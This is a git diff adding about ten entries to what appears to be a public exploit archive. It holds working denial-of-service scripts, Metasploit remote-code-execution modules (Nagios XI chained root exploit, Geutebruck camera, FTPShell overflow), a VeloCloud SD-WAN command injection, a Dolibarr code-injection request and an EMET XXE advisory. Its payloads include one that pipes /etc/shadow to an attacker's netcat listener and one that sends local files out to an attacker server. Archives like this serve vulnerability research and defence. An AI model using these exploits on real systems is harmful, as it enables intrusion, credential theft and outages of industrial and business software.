diff --git a/exploits/hardware/dos/44965.py b/exploits/hardware/dos/44965.py
new file mode 100755
index 000000000..d24287daf
--- /dev/null
+++ b/exploits/hardware/dos/44965.py
@@ -0,0 +1,34 @@
+# Exploit Title: Delta Electronics Delta Industrial Automation COMMGR
+- Remote STACK-BASED BUFFER OVERFLOW
+# Date: 02.07.2018
+# Exploit Author: t4rkd3vilz
+# Vendor Homepage: http://www.deltaww.com/
+# Software Link: http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=2093&DocPath=1&hl=en-US
+# Version:
+COMMGR Version 1.08 and prior.
+ DVPSimulator EH2, EH3, ES2, SE, SS2
+ AHSIM_5x0, AHSIM_5x1
+# Tested on: Kali Linux
+# CVE : CVE-2018-10594
+
+
+#Run exploit, result DOS
+
+import socket
+
+
+ip = raw_input("[+] IP to attack: ")
+
+sarr = []
+i = 0
+while True:
+ try:
+ sarr.append(socket.create_connection((ip,80)))
+ print "[+] Connection %d" % i
+ crash1 = "\x41"*4412 +"\X42"*1000
+ sarr[i].send(crash1+'\r\n')
+ i+=1
+ except socket.error:
+ print "[*] Server crashed "
+ raw_input()
+ break
\ No newline at end of file
diff --git a/exploits/hardware/webapps/44957.rb b/exploits/hardware/webapps/44957.rb
new file mode 100755
index 000000000..cad190b1c
--- /dev/null
+++ b/exploits/hardware/webapps/44957.rb
@@ -0,0 +1,68 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = NormalRanking
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Geutebruck simple_loglistjs.cgi Remote Command Execution',
+ 'Description' => %q{
+ This module exploits a an arbitrary command execution vulnerability. The
+ vulnerability exists in the /uapi-cgi/viewer/simple_loglistjs.cgi page and allows an
+ anonymous user to execute arbitrary commands with root privileges.
+ Firmware <= 1.12.0.19 are concerned.
+ Tested on 5.02024 G-Cam/EFD-2250 running 1.12.0.4 firmware.
+ },
+ 'Author' =>
+ [
+ 'Nicolas Mattiocco', #CVE-2018-7520 (RCE)
+ 'Davy Douhine' #CVE-2018-7520 (RCE) and metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2018-7520' ],
+ [ 'URL', 'http://geutebruck.com' ],
+ [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-079-01' ]
+ ],
+ 'Privileged' => false,
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ 'Space' => 1024,
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'generic netcat bash',
+ }
+ },
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Targets' => [[ 'Automatic', { }]],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Mar 20 2018'))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path to webapp', '/uapi-cgi/viewer/simple_loglistjs.cgi']),
+ ], self.class)
+ end
+
+ def exploit
+ header = "(){ :;}; "
+ encpayload = "#{header}#{payload.encoded}"
+ uri = target_uri.path + "?" + Rex::Text.uri_encode(encpayload, "hex-all")
+ print_status("#{rhost}:#{rport} - Attempting to exploit...")
+ res = send_request_raw(
+ {
+ 'method' => 'GET',
+ 'uri' => uri
+ })
+ end
+
+end
\ No newline at end of file
diff --git a/exploits/hardware/webapps/44959.py b/exploits/hardware/webapps/44959.py
new file mode 100755
index 000000000..5c13c36d9
--- /dev/null
+++ b/exploits/hardware/webapps/44959.py
@@ -0,0 +1,89 @@
+#!/usr/bin/env python
+
+# Exploit Title: Unauthenticated Command Injection vulnerability in VMware NSX SD-WAN by VeloCloud
+# Date: 2018-06-29
+# Exploit Author: paragonsec @ Critical Start
+# Credit: Brian Sullivan from Tevora and Section 8 @ Critical Start
+# Vendor Homepage: https://www.vmware.com
+# Security Advisory: https://www.vmware.com/security/advisories/VMSA-2018-0011.html
+# Version: 3.1.1
+# CVE: CVE-2018-6961
+
+import argparse
+import requests
+import sys
+import collections
+
+'''
+This script will return execute whatever payload you placed within it.
+Keep in mind that SD-WAN is running a slimmed down Linux version so obtaining a reverse shell isn't as simple as nc -e /bin/bash blah blah
+The command within this script will send stdout of commands to your netcat listener. Feel free to change :)
+'''
+
+#Colors
+OKRED = '\033[91m'
+OKGREEN = '\033[92m'
+ENDC = '\033[0m'
+
+parser = argparse.ArgumentParser()
+parser.add_argument("--rhost", help = "Remote Host")
+parser.add_argument("--source", help = "Victim WAN Interface (e.g ge1, ge2)")
+parser.add_argument('--lhost', help = 'Local Host listener')
+parser.add_argument('--lport', help = 'Local Port listener')
+parser.add_argument('--func', help = 'Function to abuse (e.g traceroute, ping, dns)')
+args = parser.parse_args()
+
+# Check to ensure at least one argument has been passed
+if len(sys.argv)==1:
+ parser.print_help(sys.stderr)
+ sys.exit(1)
+
+rhost = args.rhost
+source = args.source
+lhost = args.lhost
+lport = args.lport
+func = args.func
+
+# Payload to be sent to the victim. Change to whatever you like!
+# This payload will cat /etc/passwd from fictim and pipe it into a netcat connection to your listener giving you the contents of /etc/passwd
+payload = "$(cat /etc/shadow |nc " + lhost + " " + lport + ")"
+
+exploit_url = "http://" + rhost + "/scripts/ajaxPortal.lua"
+
+headers = [
+ ('User-Agent','Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'),
+ ('Accept', 'application/json, text/javascript, */*; q=0.01'),
+ ('Accept-Language', 'en-US,en;q=0.5'),
+ ('Accept-Encoding', 'gzip, deflate'),
+ ('Referer','http://' + rhost + '/'),
+ ('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8'),
+ ('X-Requested-With', 'XMLHttpRequest'),
+ ('Cookie', 'culture=en-us'),
+ ('Connection', 'close')
+]
+
+# probably not necessary but did it anyways
+headers = collections.OrderedDict(headers)
+
+# Setting up POST body parameters
+if func == 'traceroute':
+ body = "destination=8.8.8.8" + payload + "&source=" + source + "&test=TRACEROUTE&requestTimeout=900&auth_token=&_cmd=run_diagnostic"
+elif func == 'dns':
+ body = "name=google.com" + payload + "&test=DNS_TEST&requestTimeout=90&auth_token=&_cmd=run_diagnostic"
+else:
+ body = "destination=8.8.8.8" + payload + "&source=" + source + "&test=BASIC_PING&requestTimeout=90&auth_token=&_cmd=run_diagnostic"
+
+print(OKGREEN + "Author: " + ENDC + "paragonsec @ Critical Start (https://www.criticalstart.com)")
+print(OKGREEN + "Credits: " + ENDC + "Brian Sullivan @ Tevora and Section 8 team @ Critical Start")
+print(OKGREEN + "CVE: " + ENDC + "2018-6961")
+print(OKGREEN + "Description: " + ENDC + "Multiple Unauthenticated Command Injection Vulnerabilities in VeloCloud SD-WAN GUI Application\n")
+
+print(OKGREEN + "[+]" + ENDC + "Running exploit...")
+
+s = requests.Session()
+
+req = requests.post(exploit_url, headers=headers, data=body)
+if "UNKNOWN_COMMAND" not in req.text:
+ print(OKGREEN + "[+]" + ENDC + "Exploit worked. Check listener!")
+else:
+ print(OKRED + "[!]" + ENDC + "Exploit failed. You lose!")
\ No newline at end of file
diff --git a/exploits/linux/dos/44962.txt b/exploits/linux/dos/44962.txt
new file mode 100644
index 000000000..1ba7fb8da
--- /dev/null
+++ b/exploits/linux/dos/44962.txt
@@ -0,0 +1,28 @@
+# Exploit Title: SIPp 3.6 - Local Buffer Overflow (PoC)
+# Date: 2018-06-30
+# Exploit Author: Fakhri Zulkifli
+# Vendor Homepage: http://sipp.sourceforge.net/
+# Software Link: https://github.com/SIPp/sipp/releases
+# Version: 3.6-dev and earlier
+# Tested on: 3.6-dev
+
+$ ./sipp -3pcc `python -c ‘print “A” * 300'`
+
+#0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425
+#1 0x668d06 in main /home/user/sipp/src/sipp.cpp:1531:17
+#2 0x7ff5ec21282f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
+#3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8)
+
+$ ./sipp -i `python -c ‘print “A” * 300'`
+
+#0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425
+#1 0x66a303 in main /home/user/sipp/src/sipp.cpp:1477:17
+#2 0x7f281302682f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
+#3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8)
+
+$ ./sipp -log_file `python -c ‘print “A” * 300'`
+
+#0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425
+#1 0x66912f in main /home/user/sipp/src/sipp.cpp:1706:17
+#2 0x7f6ca663782f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
+#3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8)
\ No newline at end of file
diff --git a/exploits/linux/remote/44969.rb b/exploits/linux/remote/44969.rb
new file mode 100755
index 000000000..c1715c9fd
--- /dev/null
+++ b/exploits/linux/remote/44969.rb
@@ -0,0 +1,363 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ManualRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Nagios XI Chained Remote Code Execution',
+ 'Description' => %q{
+ This module exploits a few different vulnerabilities in Nagios XI 5.2.6-5.4.12 to gain remote root access.
+ The steps are:
+ 1. Issue a POST request to /nagiosql/admin/settings.php which sets the database user to root.
+ 2. SQLi on /nagiosql/admin/helpedit.php allows us to enumerate API keys.
+ 3. The API keys are then used to add an administrative user.
+ 4. An authenticated session is established with the newly added user
+ 5. Command Injection on /nagiosxi/backend/index.php allows us to execute the payload with nopasswd sudo,
+ giving us a root shell.
+ 6. Remove the added admin user and reset the database user.
+ },
+ 'Author' =>
+ [
+ 'Cale Smith', # @0xC413
+ 'Benny Husted', # @BennyHusted
+ 'Jared Arave' # @iotennui
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'linux',
+ 'Arch' => [ARCH_X86],
+ 'CmdStagerFlavor' => ['printf'],
+ 'Targets' =>
+ [
+ [
+ 'Nagios XI 5.2.6 <= 5.4.12',
+ upper_version: Gem::Version.new('5.4.12'),
+ lower_version: Gem::Version.new('5.2.6')
+ ]
+ ],
+ 'References' =>
+ [
+ ['EDB', '44560'],
+ ['CVE', '2018-8733'],
+ ['CVE', '2018-8734'],
+ ['CVE', '2018-8735'],
+ ['CVE', '2018-8736'],
+ ['URL', 'http://blog.redactedsec.net/exploits/2018/04/26/nagios.html']
+ ],
+ 'Privileged' => true,
+ 'DefaultOptions' => {
+ 'WSFDELAY' => 30
+ },
+ 'DisclosureDate' => 'Apr 17, 2018',
+ 'DefaultTarget' => 0))
+ register_options(
+ [
+ #WSFDelay option is being ignored, getting around this with a call to Rex.sleep
+ #Sometimes Nagios doesn't execute commands immediately, so play with this parameter.
+ Opt::RPORT(80),
+ OptInt.new('WAIT', [ true, "Number of seconds to wait for exploit to run", 15 ])
+ ])
+ deregister_options('SRVHOST', 'SRVPORT')
+ end
+
+ def check
+ vprint_status "STEP 0: Get Nagios XI version string."
+ res = send_request_cgi!({
+ 'method' => 'GET',
+ 'uri' => '/nagiosxi/'
+ })
+
+ if !res || !res.get_html_document
+ fail_with(Failure::Unknown, 'Could not check nagios version')
+ end
+
+ if (@version = res.get_html_document.at('//input[@name = "version"]/@value').text)
+ @version = Gem::Version.new(@version)
+ vprint_good("STEP 0: Found Nagios XI version: #{@version.to_s}")
+ if @version < target[:lower_version]
+ vprint_bad('Try nagios_xi_chained for this version.')
+ elsif (@version <= target[:upper_version] && @version >= target[:lower_version])
+ return CheckCode::Appears
+ end
+ end
+ CheckCode::Safe
+ end
+
+ def set_db_user(usr, passwd)
+ step = usr == 'root' ? '1' : '6.1'
+ vprint_status "STEP #{step}: Setting Nagios XI DB user to #{usr}."
+ res = send_request_cgi({
+ 'uri' => '/nagiosql/admin/settings.php',
+ 'method' => 'POST',
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'encode_params' => true,
+ 'vars_post' => {
+ 'txtRootPath'=>'nagiosql',
+ 'txtBasePath'=>'/var/www/html/nagiosql/',
+ 'selProtocol'=>'http',
+ 'txtTempdir'=>'/tmp',
+ 'selLanguage'=>'en_GB',
+ 'txtEncoding'=>'utf-8',
+ 'txtDBserver'=>'localhost',
+ 'txtDBport'=>3306,
+ 'txtDBname'=>'nagiosql',
+ 'txtDBuser'=> usr,
+ 'txtDBpass'=> passwd,
+ 'txtLogoff'=>3600,
+ 'txtLines'=>15,
+ 'selSeldisable'=>1
+ }
+ })
+
+ if !res || res.code != 302
+ fail_with(Failure::UnexpectedReply,"STEP #{step}: Unexpected response setting db user to root")
+ end
+ vprint_status "STEP #{step}: Received a 302 Response. That's good!"
+ end
+
+ def get_api_keys
+ vprint_status 'STEP 2: Exploiting SQLi to extract user API keys.'
+
+ sqli_parm = @version < Gem::Version.new('5.3.0') ? 'backend_ticket' : 'api_key'
+ sqli_val = rand_text_alpha(rand(5) + 5)
+ res = send_request_cgi({
+ 'uri' => '/nagiosql/admin/helpedit.php',
+ 'method' => 'POST',
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'encode_params' => true,
+ 'vars_post' => {
+ 'selInfoKey1'=>"#{sqli_val}'UNION SELECT CONCAT('START_API:',#{sqli_parm},':END_API') FROM nagiosxi.xi_users-- ",
+ 'hidKey1'=>'common',
+ 'selInfoKey2'=>'free_variables_name',
+ 'hidKey2'=>'',
+ 'selInfoVersion'=>'',
+ 'hidVersion'=>'',
+ 'taContent'=>'',
+ 'modus'=>0
+ }
+ })
+
+ if !res || res.code != 302 || !res.body
+ fail_with(Failure::UnexpectedReply,'STEP 2: Unexpected response extracting api keys')
+ end
+
+ vprint_status 'STEP 2: Received a 302 Response. That\'s good!'
+ parse_api_key(res.body)
+ end
+
+ def parse_api_key(res_body)
+ begin_positions = res_body.enum_for(:scan, /START_API:/).map { Regexp.last_match.end(0) }
+ end_positions = res_body.enum_for(:scan, /:END_API/).map { Regexp.last_match.begin(0) - 1 }
+ api_keys = []
+
+ begin_positions.each_with_index do|val, i|
+ key = res_body[val..end_positions[i]]
+ unless api_keys.include?(key)
+ api_keys << key
+ end
+ end
+
+ if api_keys.length < 1
+ fail_with(Failure::Unknown, 'Could not parse api keys')
+ end
+
+ vprint_status "Found #{api_keys.length.to_s} unique api keys"
+ api_keys.each do |key|
+ vprint_status key
+ end
+
+ api_keys
+ end
+
+ def add_admin(keys, username, password)
+ vprint_status 'STEP 3: Using API Keys to add an administrative user...'
+ keys.each do |key|
+ user_id = try_add_admin(key, username, password)
+
+ if (user_id.to_i > 0)
+ vprint_good "Added user:#{username} password:#{password} userid:#{user_id}"
+ return user_id.to_s, key
+ end
+ end
+ fail_with(Failure::Unknown, 'STEP 3: Failed to add a user.')
+ end
+
+ def try_add_admin(key, username, passwd)
+ vprint_status "STEP 3: trying to add admin user with key #{key}"
+ res = send_request_cgi({
+ 'uri'=> "/nagiosxi/api/v1/system/user",
+ 'method' => 'POST',
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'vars_get' => {
+ 'apikey' => key,
+ 'pretty' => 1
+ },
+ 'vars_post' =>{
+ 'username' => username,
+ 'password' => passwd,
+ 'name' => rand_text_alpha(rand(5) + 5),
+ 'email' =>"#{username}@localhost",
+ 'auth_level' =>'admin',
+ 'force_pw_change' => 0
+ }
+ })
+
+ json = res.get_json_document
+ json['userid'] ? json['userid'].to_i : -1
+ end
+
+ def delete_admin(key, user_id)
+ res = send_request_cgi({
+ 'uri'=> "/nagiosxi/api/v1/system/user/#{user_id}",
+ 'method' => 'DELETE',
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'vars_get' => {
+ 'apikey' => key
+ }
+ })
+
+ res.body && res.body.include?('was added successfully') ? username : false
+ end
+
+ def login(username, password)
+ vprint_status "STEP 4.1: Authenticate as user #{username} with password #{password}"
+ #4.1 Get nsp for login
+ vprint_status 'STEP 4.1: Get NSP and nagiosxi for login..'
+ res = send_request_cgi({
+ 'uri' =>'/nagiosxi/login.php',
+ 'method' => 'POST',
+ 'ctype' => 'application/x-www-form-urlencoded'
+ })
+
+ if !res || !res.body
+ fail_with(Failure::Unknown, 'STEP 4.1: Could not get nsp string for login')
+ end
+
+ login_nsp = parse_nsp_str(res.body)
+ vprint_status "STEP 4.1: login_nsp #{login_nsp} "
+
+ login_nagiosxi = parse_nagiosxi(res)
+ vprint_status "STEP 4.1: login_nagiosxi #{login_nagiosxi}"
+
+ vprint_status 'STEP 4.2: Authenticating...'
+ res = send_request_cgi({
+ 'uri'=> '/nagiosxi/login.php',
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'method' => 'POST',
+ 'cookie' => "nagiosxi=#{login_nagiosxi};",
+ 'vars_post'=> {
+ 'nsp' => login_nsp,
+ 'page' => 'auth',
+ 'debug' => '',
+ 'pageopt' => 'login',
+ 'username' => username,
+ 'password' => password,
+ 'loginButton' => ''
+ }
+ })
+
+ if !res || res.code != 302
+ fail_with(Failure::Unknown, 'STEP 4.2 Could not get authed nsp string.')
+ end
+
+ authed_nagiosxi = parse_nagiosxi(res)
+ vprint_status "STEP 4.2: authed_nagiosxi #{authed_nagiosxi}"
+ authed_nagiosxi
+ end
+
+ def parse_nsp_str(resp_body)
+ nsp_strs = /var nsp_str = "(.+)";\n/.match(resp_body)
+
+ unless nsp_strs || nsp_strs.length < 2
+ fail_with(Failure::NotFound, 'Could not find nsp_str')
+ end
+
+ nsp_strs[1]
+ end
+
+ def parse_nagiosxi(res)
+ cookie = res.get_cookies
+ matches = /.*nagiosxi=(.+);/.match(cookie)
+
+ unless matches || matches.length < 2
+ fail_with(Failure::NotFound, 'Could not find nagiosxi cookie')
+ end
+
+ matches[1]
+ end
+
+ def execute_command(cmd, opts = {})
+ backup_file = rand_text_alpha(rand(5) + 10)
+
+ cmd_execution = "$(cp /usr/local/nagiosxi/scripts/reset_config_perms.sh /usr/local/nagiosxi/scripts/#{backup_file} ; echo \"#{cmd}\" > /usr/local/nagiosxi/scripts/reset_config_perms.sh ; sudo /usr/local/nagiosxi/scripts/reset_config_perms.sh) &"
+
+ cmd_cleanup = "$(mv /usr/local/nagiosxi/scripts/#{backup_file} /usr/local/nagiosxi/scripts/reset_config_perms.sh)"
+ opts_exec = {
+ 'uri'=> '/nagiosxi/backend/index.php',
+ 'method' => 'POST',
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'cookie' => "nagiosxi=#{@nagiosxi}",
+ 'vars_get' => {
+ 'cmd'=>'submitcommand',
+ 'command'=>'1111',
+ 'command_data'=> cmd_execution
+ }
+ }
+
+ opts_cleanup = {
+ 'uri'=> '/nagiosxi/backend/index.php',
+ 'method' => 'POST',
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'cookie' => "nagiosxi=#{@nagiosxi}",
+ 'vars_get' => {
+ 'cmd'=>'submitcommand',
+ 'command'=>'1111',
+ 'command_data'=> cmd_cleanup
+ }
+ }
+
+ vprint_status 'STEP 5.1: executing payload'
+ res = send_request_cgi(opts_exec)
+
+ if !res || res.code != 200
+ fail_with(Failure::Unknown, 'STEP 5.1: Command execution failed')
+ end
+
+ vprint_status 'STEP 5.2: removing scripts from disc'
+ res = send_request_cgi(opts_cleanup)
+
+ if !res || res.code != 200
+ fail_with(Failure::Unknown, 'STEP 5.2: Command cleanup failed')
+ end
+ end
+
+ def exploit
+ if check != CheckCode::Appears
+ fail_with(Failure::NotVulnerable, 'STEP 0: Vulnerable version not found! punt!')
+ end
+
+ set_db_user('root', 'nagiosxi')
+
+ keys = get_api_keys
+ username = rand_text_alpha(rand(6) + 10)
+ password = rand_text_alpha(rand(6) + 10)
+
+ user_id, key = add_admin(keys, username, password)
+ @nagiosxi = login(username, password)
+ execute_cmdstager()
+
+ #revert databaseuser
+ set_db_user('nagiosql', 'n@gweb')
+ vprint_status 'STEP 6.2: deleting admin'
+ delete_admin(key, user_id)
+
+ #The WSFDelay option is being ignored currently, so this is this workaround.
+ Rex.sleep(datastore['WAIT'].to_i)
+ end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/44960.html b/exploits/php/webapps/44960.html
new file mode 100644
index 000000000..ab2d94928
--- /dev/null
+++ b/exploits/php/webapps/44960.html
@@ -0,0 +1,25 @@
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/44964.txt b/exploits/php/webapps/44964.txt
new file mode 100644
index 000000000..0c1f6f3f2
--- /dev/null
+++ b/exploits/php/webapps/44964.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Unauthenticated Remote Code Evaluation in Dolibarr ERP CRM =<7.0.3
+# Date: 06/29/2018
+# Exploit Author: om3rcitak - https://omercitak.com
+# Vendor Homepage: https://dolibarr.org
+# Software Link: https://github.com/Dolibarr/dolibarr
+# Version: =<7.0.3
+# Tested on: Unix, Windows
+
+## Technical Details
+URL: http://{domain}/{dolibarr_path}/install/step1.php
+Parameter Name: db_name
+Parameter Type: POST
+Attack Pattern: x\';system($_GET[cmd]);//
+
+## Steps to reproduce the behavior
+- Go to fresh install page.
+- Click "Next Step" button for create example config file (conf/conf.php)
+- Send this request:
+```
+POST {dolibarr_path}/install/step1.php HTTP/1.1
+Host: {domain}
+
+testpost=ok&action=set&main_dir=C%3A%2FAmpps%2Fwww&main_data_dir=C%3A%2FAmpps%2Fwww%2Fdocuments&main_url=http%3A%2F%2Flocalhost+&db_name=x%5C%27%3Bsystem(%24_GET%5Bcmd%5D)%3B%2F%2F&db_type=mysqli&db_host=localhost&db_port=3306&db_prefix=llx_&db_create_database=on&db_user=root&db_pass=root&db_create_user=on&db_user_root=root&db_pass_root=root&selectlang=auto
+```
+- Visit url and run the command: `http://{domain}/{dolibarr_path}/install/check.php?cmd=cat /etc/passwd`
+
+## Timeline
+- 06/29/2018 18:30 - Found vulnerability.
+- 06/29/2018 18:44 - Report vendor.
+- 06/29/2018 20:38 - Vulnerability fixed by vendor.
+
+GitHub Issue: https://github.com/Dolibarr/dolibarr/issues/9032
\ No newline at end of file
diff --git a/exploits/windows/dos/44958.py b/exploits/windows/dos/44958.py
new file mode 100755
index 000000000..89aa813be
--- /dev/null
+++ b/exploits/windows/dos/44958.py
@@ -0,0 +1,50 @@
+# Exploit Title: Core FTP LE 2.2 - Buffer Overflow (PoC)
+# Date: 2018-06-28
+# Exploit Author: Berk Cem Göksel
+# Vendor Homepage: http://www.coreftp.com/
+# Software Link: http://www.coreftp.com/download
+# Version: Core FTP Client LE v2.2 Build 1921
+# Tested on: Windows 10
+# Category: Dos
+# CVE : CVE-2018-12113
+# coding: utf-8
+
+# Description:]
+# The vulnerability was discovered during a vulnerability research lecture.
+# This is meant to be a PoC.
+
+#!/usr/bin/env python
+
+import socket
+
+IP = '0.0.0.0'
+port = 21
+
+
+Stack_beginning = 3004
+
+buff = "\x90" * (3004)
+
+try:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.bind((IP, port))
+ s.listen(20)
+ print("[i] FTP Server started on port: "+str(port)+"\r\n")
+except:
+ print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
+
+while True:
+ conn, addr = s.accept()
+ conn.send('220 Welcome!' + '\r\n')
+ print conn.recv(1024)
+ conn.send('331 OK.\r\n')
+ print conn.recv(1024)
+ conn.send('230 OK.\r\n')
+ print conn.recv(1024)
+ conn.send('215 UNIX Type: L8\r\n')
+ print conn.recv(1024)
+ conn.send('257 "/" is current directory.\r\n')
+ print conn.recv(1024)
+ conn.send('227 Entering Passive Mode (' + buff + ')\r\n')
+ print conn.recv(1024)
+ conn.send('257' + '\r\n')
\ No newline at end of file
diff --git a/exploits/windows/local/44961.txt b/exploits/windows/local/44961.txt
new file mode 100644
index 000000000..b079b820e
--- /dev/null
+++ b/exploits/windows/local/44961.txt
@@ -0,0 +1,112 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-EMET-XML-INJECTION.txt
+[+] ISR: Apparition Security
+
+
+
+***Greetz: indoushka|Eduardo|Dirty0tis|cor3sm4sh3r***
+
+
+
+Vendor:
+================
+www.microsoft.com
+
+
+Product:
+===========
+Enhanced Mitigation Experience Toolkit (EMET)
+
+Enhanced Mitigation Experience Toolkit is a freeware security toolkit for Microsoft Windows, developed by Microsoft.
+It provides a unified interface to enable and fine-tune Windows security features.
+
+
+
+Vulnerability Type:
+===================
+XML External Entity Injection
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+Security Issue:
+================
+EMETs XML parser does not account for external entity declarations in ".config" files. This allows outbound network connections and users local files
+to be exfiltrated to remote attacker controlled server. Conditions are a user must be tricked into importing a specially crafted XML file.
+
+
+
+Exploit/POC:
+=============
+1) python -m SimpleHTTPServer
+
+
+2) "payload.dtd"
+
+
+">
+%all;
+
+
+3) "config.xml"
+
+import into EMET interface.
+
+
+
+
+
+%dtd;]>
+&send;
+
+
+Result seen on ATTACK-SERVER:
+=============================
+
+C:\sec>python -m SimpleHTTPServer
+Serving HTTP on 0.0.0.0 port 8000 ...
+PC - - [19/May/2018 22:53:02] "GET /payload.dtd HTTP/1.1" 200 -
+PC - - [19/May/2018 22:53:02] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA8
+0WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awa
+ve=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 301 -
+PC - - [19/May/2018 22:53:02] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA8
+0WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awa
+
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: June 5, 2018
+Vendor reply : "We determined your finding is valid but does not meet our bar for servicing" : June 30, 2018
+June 30, 2018 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/remote/44968.rb b/exploits/windows/remote/44968.rb
new file mode 100755
index 000000000..939045678
--- /dev/null
+++ b/exploits/windows/remote/44968.rb
@@ -0,0 +1,103 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::TcpServer
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise
+ edition) allowing remote code execution.
+ },
+ 'Author' =>
+ [
+ 'r4wd3r', # Original exploit author
+ 'Daniel Teixeira' # MSF module author
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2018-7573'],
+ [ 'EDB', '44596' ]
+ ],
+ 'Payload' =>
+ {
+ 'Space' => 400,
+ 'BadChars' => "\x00\x22\x0d\x0a\x0b"
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ # CALL ESI in FTPShell.exe : 0x00452eed
+ [ 'Windows Universal', {'Ret' => "\xed\x2e\x45" } ]
+ ],
+ 'Privileged' => false,
+ 'DefaultOptions' =>
+ {
+ 'SRVHOST' => '0.0.0.0',
+ 'EXITFUNC' => 'thread'
+ },
+ 'DisclosureDate' => 'Mar 4 2017',
+ 'DefaultTarget' => 0))
+
+ register_options [ OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ]) ]
+ end
+
+ def exploit
+ srv_ip_for_client = datastore['SRVHOST']
+ if srv_ip_for_client == '0.0.0.0'
+ if datastore['LHOST']
+ srv_ip_for_client = datastore['LHOST']
+ else
+ srv_ip_for_client = Rex::Socket.source_address('50.50.50.50')
+ end
+ end
+
+ srv_port = datastore['SRVPORT']
+
+ print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}")
+ super
+ end
+
+ def on_client_connect(client)
+ p = regenerate_payload(client)
+ return if p.nil?
+ print_status("#{client.peerhost} - connected.")
+
+ res = client.get_once.to_s.strip
+ print_status("#{client.peerhost} - Request: #{res}") unless res.empty?
+ print_status("#{client.peerhost} - Response: Sending 220 Welcome")
+ welcome = "220 Welcome.\r\n"
